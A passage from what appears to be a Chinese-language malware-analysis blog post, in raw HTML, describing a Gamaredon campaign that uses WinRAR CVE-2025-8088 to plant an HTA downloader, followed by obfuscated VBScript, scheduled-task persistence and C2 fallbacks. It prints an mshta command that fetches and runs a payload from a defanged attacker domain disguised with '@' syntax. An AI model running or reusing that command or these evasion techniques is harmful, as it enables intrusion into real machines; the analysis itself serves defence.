0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023960" class="rich_pages wxw-img" data-ratio="0.33214285714285713" data-type="png" data-w="840" src="https://wechat2rss.xlab.app/img-proxy/?k=98b077de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwl7NEFgnOK6LR4GuiarMSbkZdRyy8wLcfnyKiafsOU4T4VwWRM9fE3wKg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">图2.解压时显示的WinRAR错误</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.2. </span><span leaf="">第一阶段执行：HTA下载器</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在CVE-2025-8088漏洞利用成功后，攻击者依赖受害者计算机的下一次重启或用户重新登录，来触发Windows启动目录中的HTA文件。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">典型TTP：</span>HTA文件的加载和执行是Gamaredon组织的惯用手法。此阶段的HTA文件内嵌了一个简短的VBScript脚本。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">载荷分析：</span>此阶段的HTA文件（如图3所示）内嵌了一个简短的VBScript脚本，其核心功能是扮演一个下载器(Downloader)。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023961" class="rich_pages wxw-img" data-ratio="0.5098265895953757" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=c58e4f1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwLjWpNNLv54LGpUN1z5iaaCSDu4CtIPs1v5ibEZAhC35acyFy1Wdms7cA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">图3.初始HTA文件</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">执行流程：</span>该VBScript通过命令行启动mshta.exe进程，并传递一个URL参数，用以从远程C2服务器下载并执行第二阶段的攻击脚本。解析后的命令如下：</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf="">mshta.exe <a href="http://censor.net@open-files.sytes[.]net/GPuUkr/copiesDIB/sheetODy.pdf" target="_blank">http://censor.net@open-files.sytes[.]net/GPuUkr/copiesDIB/sheetODy.pdf</a></span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">命令分析：</span>攻击者使用了censor.net@语法，试图混淆或绕过对真实主机名open-files.sytes.net的检测。结合以往对Gamaredon组织攻击活动的持续追踪分析，所下载的sheetODy.pdf文件并非合法的PDF文档，而是一个伪装成PDF的VBScript脚本，之后mshta.exe会立即对其进行解析和执行。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3. </span><span leaf="">第二阶段载荷：多层混淆VBScript</span></span></strong></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">mshta.exe下载并执行的脚本是该组织的主要VBScript载荷。此次攻击延续了该组织标志性的“组合式VBS”脚本结构，具有多层嵌套和解密的特点。</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023962" class="rich_pages wxw-img" data-ratio="0.0440324449594438" data-type="png" data-w="863" src="https://wechat2rss.xlab.app/img-proxy/?k=aaa71498&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwq9Jec5WvUHCTk53j0ZaicBFmAsH5ykpWJB11ffsxOV2nytE3ns9S9CA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">为规避反病毒软件的静态检测，脚本采用了多层混淆手段：</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">1. 字符串替换：</span>脚本中充斥着无意义的字符串变量和复杂的自定义替换函数，用于在运行时动态重组（Deobfuscate）出真正的恶意代码。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">2. Base64编码：</span>核心功能逻辑（如C2通信、持久化）以及下一阶段的VBScript代码，通常被Base64编码后嵌入在脚本中，等待执行时解码。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023963" class="rich_pages wxw-img" data-ratio="0.03815028901734104" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=bc3e1f30&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwR4jRHbAQdpWPMEiaVRUsD1icUdeIT5sib7uuG9G3SGLnbAalmNI4LkeFg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">这种多层VBS脚本在逐层解密和执行过程中，会释放一个或多个功能组件，以执行信息收集、建立C2通信，并部署额外的持久化机制。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.4. </span><span leaf="">持久化与C2通信</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">VBScript载荷成功执行后，其核心任务之一是建立多层持久化机制，以确保攻击的稳固性。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">持久化：</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: normal;">1. 启动目录：如2.1所述，利用CVE-2025-8088漏洞在Windows启动目录中释放HTA文件，是其第一层持久化。</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: normal;">2. 计划任务：后续阶段的VBScript载荷会进一步将自身复制到 %USERPROFILE% 或 %TEMP% 目录，并创建一个伪装的计划任务。该计划任务通常被命名为与合法系统服务相似的名称，配置为在用户登录或系统启动时触发，构成第二层持久化。</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023964" class="rich_pages wxw-img" data-ratio="0.03815028901734104" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=27d82a33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwxNLVw9UWbkGRZfrAU3ibN55x1uGzyfl6Yu6hBS3VGkFqy7Tw54Ovo1Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">C2通信：</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">1. 脚本中包含一个初始硬编码的C2域名，用于首次回连。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023965" class="rich_pages wxw-img" data-ratio="0.08786127167630058" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=88c61dd8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwT6zlEPAIoicAqDcuo0QaJMB1fuhwSnicf3vxfIibnq3EcnIjMPVeKvHXA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">2. 为增强通信的弹性和对抗能力，脚本通常还会设置多个备用C2地址。这些恶意载荷及计划任务均使用伪装性名称，以便混淆视听并供后续组件调用或动态更新。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023966" data-ratio="0.01853997682502897" data-w="863" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=c17499aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWw8ibVRtIoicvl48srM6k22HESELu7AwicKibfIu7QIRkOK6micsV0ABtq59g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 